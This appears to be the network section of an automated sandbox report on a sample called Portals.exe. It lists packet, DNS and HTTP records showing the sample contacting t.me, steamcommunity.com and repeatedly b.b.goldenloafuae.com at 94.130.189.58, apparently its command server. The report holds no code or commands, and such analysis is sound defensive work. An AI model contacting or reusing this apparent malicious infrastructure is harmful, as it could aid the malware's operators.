                                                                                                                                                                                                    Mar 13, 2025 18:03:20.427393913 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.427460909 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.427478075 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.427531958 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.427555084 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.427570105 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.427618980 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.427697897 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.427764893 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.427778959 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.427834988 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.427911997 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.427927971 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.427987099 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428067923 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428131104 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428158045 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428174019 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428237915 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428302050 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428328037 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428395987 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428457022 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428472996 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428540945 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428586960 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428603888 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428667068 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428714037 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428731918 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428792000 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428841114 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428858042 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428921938 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.428986073 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.429002047 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.429059982 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.429114103 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.429183960 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.429241896 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.429310083 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.429326057 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.429406881 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.429421902 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.429486036 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.429533958 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.429595947 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.429657936 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.429721117 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.429783106 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.429867983 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.429919004 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.429991961 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430058956 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430129051 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430145025 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430214882 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430229902 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430288076 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430319071 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430386066 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430402040 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430469036 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430493116 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430560112 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430624962 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430691957 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430737019 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430805922 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430833101 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430897951 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.430936098 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431003094 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431018114 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431067944 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431087017 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431107998 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431122065 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431179047 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431197882 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431216002 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431293011 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431310892 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431389093 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431447983 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431510925 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431565046 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431637049 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431699038 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431759119 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431781054 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.431962967 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:20.432431936 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:21.415788889 CET4434978894.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:21.416002989 CET49788443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:21.419188976 CET49788443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:21.419200897 CET4434978894.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:21.419533968 CET4434978894.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:21.419584990 CET49788443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:21.419967890 CET49788443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:21.464329958 CET4434978894.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:22.560792923 CET4434978894.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:22.560817957 CET4434978894.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:22.560879946 CET49788443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:22.560894012 CET4434978894.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:22.560900927 CET49788443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:22.560937881 CET49788443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:22.561160088 CET49788443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:22.561173916 CET4434978894.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:22.563695908 CET49789443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:22.563736916 CET4434978994.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:22.563802958 CET49789443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:22.564017057 CET49789443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:22.564033031 CET4434978994.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:24.723009109 CET4434978994.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:24.723083019 CET49789443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:24.723501921 CET49789443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:24.723515034 CET4434978994.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:24.725702047 CET49789443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:24.725707054 CET4434978994.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:26.187706947 CET4434978994.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:26.187769890 CET49789443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:26.187783003 CET4434978994.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:26.187829018 CET49789443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:26.188039064 CET49789443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:26.188057899 CET4434978994.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:26.206115007 CET49790443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:26.206149101 CET4434979094.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:26.206270933 CET49790443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:26.206480980 CET49790443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:26.206496000 CET4434979094.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:27.659490108 CET4434979094.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:27.659562111 CET49790443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:27.659998894 CET49790443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:27.660007954 CET4434979094.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:27.661469936 CET49790443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:27.661474943 CET4434979094.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:28.110119104 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:28.110183001 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:28.110209942 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:28.110249043 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:28.111368895 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:28.111402988 CET4434978794.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:28.111448050 CET49787443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:28.649806023 CET4434979094.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:28.650089025 CET49790443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:28.650147915 CET4434979094.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:28.650219917 CET49790443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:28.651056051 CET49790443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:28.651103020 CET4434979094.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:28.651158094 CET49790443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:29.286214113 CET49791443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:29.286272049 CET4434979194.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:29.286341906 CET49791443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:29.286585093 CET49791443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:29.286604881 CET4434979194.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.840404034 CET4434979194.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.840589046 CET49791443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.843666077 CET49791443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.843677998 CET4434979194.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.843913078 CET4434979194.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.843965054 CET49791443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.844418049 CET49791443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.844491959 CET49791443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.844516993 CET4434979194.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.844598055 CET49791443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.844635010 CET4434979194.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.844738960 CET49791443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.844763994 CET4434979194.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.844805002 CET49791443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.844813108 CET4434979194.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.844844103 CET49791443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.844856977 CET4434979194.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.844906092 CET49791443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:30.892323971 CET4434979194.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:31.370259047 CET4971380192.168.2.4184.30.131.245
                                                                                                                                                                                                    Mar 13, 2025 18:03:31.370327950 CET49711443192.168.2.420.190.159.68
                                                                                                                                                                                                    Mar 13, 2025 18:03:31.370415926 CET4971280192.168.2.4199.232.210.172
                                                                                                                                                                                                    Mar 13, 2025 18:03:31.375621080 CET8049713184.30.131.245192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:31.375693083 CET4971380192.168.2.4184.30.131.245
                                                                                                                                                                                                    Mar 13, 2025 18:03:31.376269102 CET4434971120.190.159.68192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:31.376283884 CET8049712199.232.210.172192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:31.376327991 CET49711443192.168.2.420.190.159.68
                                                                                                                                                                                                    Mar 13, 2025 18:03:31.376352072 CET4971280192.168.2.4199.232.210.172
                                                                                                                                                                                                    Mar 13, 2025 18:03:32.228157997 CET4434979194.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:32.228240013 CET49791443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:32.228266954 CET4434979194.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:32.228326082 CET49791443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:32.228437901 CET49791443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:32.228482008 CET4434979194.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:32.228524923 CET49791443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:32.233632088 CET49792443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:32.233671904 CET4434979294.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:32.233752966 CET49792443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:32.233947039 CET49792443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:32.233958960 CET4434979294.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:33.717418909 CET4434979294.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:33.717525005 CET49792443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:33.720611095 CET49792443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:33.720623970 CET4434979294.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:33.720949888 CET4434979294.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:33.721008062 CET49792443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:33.721282959 CET49792443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:33.764322042 CET4434979294.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:34.736866951 CET4434979294.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:34.736958981 CET49792443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:34.736967087 CET4434979294.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:34.737147093 CET49792443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:34.737448931 CET49792443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:34.737468004 CET4434979294.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:34.739842892 CET49793443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:34.739875078 CET4434979394.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:34.739947081 CET49793443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:34.740175009 CET49793443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:34.740186930 CET4434979394.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:36.716600895 CET4434979394.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:36.716691971 CET49793443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:36.717145920 CET49793443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:36.717152119 CET4434979394.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:36.718806028 CET49793443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:36.718810081 CET4434979394.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:37.727446079 CET4434979394.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:37.727530003 CET49793443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:37.727556944 CET4434979394.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:37.727605104 CET49793443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:37.727963924 CET49793443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:03:37.727998972 CET4434979394.130.189.58192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:37.728060007 CET49793443192.168.2.494.130.189.58
                                                                                                                                                                                                    Mar 13, 2025 18:04:11.495260954 CET44349709131.253.33.254192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:04:11.495354891 CET49709443192.168.2.4131.253.33.254

                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Mar 13, 2025 18:01:57.269650936 CET6097253192.168.2.41.1.1.1
                                                                                                                                                                                                    Mar 13, 2025 18:01:57.276671886 CET53609721.1.1.1192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:01:59.794152975 CET5090453192.168.2.41.1.1.1
                                                                                                                                                                                                    Mar 13, 2025 18:01:59.816926003 CET53509041.1.1.1192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:02:05.624983072 CET5855053192.168.2.41.1.1.1
                                                                                                                                                                                                    Mar 13, 2025 18:02:05.632349968 CET53585501.1.1.1192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.365554094 CET53536441.1.1.1192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.568820000 CET6268653192.168.2.41.1.1.1
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.568953037 CET5309453192.168.2.41.1.1.1
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.570749998 CET4997053192.168.2.41.1.1.1
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.570859909 CET6034153192.168.2.41.1.1.1
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.575489044 CET53530941.1.1.1192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.575638056 CET53626861.1.1.1192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.576894999 CET53634821.1.1.1192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.579952002 CET53500981.1.1.1192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.580142975 CET53499701.1.1.1192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.580588102 CET53603411.1.1.1192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:04.008579016 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                    Mar 13, 2025 18:03:04.953583002 CET53583141.1.1.1192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:05.126023054 CET53547831.1.1.1192.168.2.4
                                                                                                                                                                                                    Mar 13, 2025 18:03:05.563785076 CET53627771.1.1.1192.168.2.4

                                                                                                                                                                                                    ICMP Packets

                                                                                                                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.575412035 CET192.168.2.41.1.1.1c211(Port unreachable)Destination Unreachable

                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                    Mar 13, 2025 18:01:57.269650936 CET192.168.2.41.1.1.10xaf0bStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Mar 13, 2025 18:01:59.794152975 CET192.168.2.41.1.1.10xf578Standard query (0)b.b.goldenloafuae.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Mar 13, 2025 18:02:05.624983072 CET192.168.2.41.1.1.10x9664Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.568820000 CET192.168.2.41.1.1.10xd98fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.568953037 CET192.168.2.41.1.1.10xd4e9Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.570749998 CET192.168.2.41.1.1.10x518dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.570859909 CET192.168.2.41.1.1.10x9f06Standard query (0)www.google.com65IN (0x0001)false

                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                    Mar 13, 2025 18:01:57.276671886 CET1.1.1.1192.168.2.40xaf0bNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Mar 13, 2025 18:01:59.816926003 CET1.1.1.1192.168.2.40xf578No error (0)b.b.goldenloafuae.com94.130.189.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Mar 13, 2025 18:02:05.632349968 CET1.1.1.1192.168.2.40x9664No error (0)steamcommunity.com23.197.127.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.575489044 CET1.1.1.1192.168.2.40xd4e9No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.575638056 CET1.1.1.1192.168.2.40xd98fNo error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.580142975 CET1.1.1.1192.168.2.40x518dNo error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Mar 13, 2025 18:03:02.580588102 CET1.1.1.1192.168.2.40x9f06No error (0)www.google.com65IN (0x0001)false

                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                    • t.me
                                                                                                                                                                                                    • steamcommunity.com
                                                                                                                                                                                                    • b.b.goldenloafuae.com
                                                                                                                                                                                                    • www.google.com

                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    0192.168.2.449732116.202.4.2234438012C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Mar 13, 2025 18:02:16.209096909 CET163INHTTP/1.0 522 status code 522
                                                                                                                                                                                                    content-type: text/plain; charset=utf-8
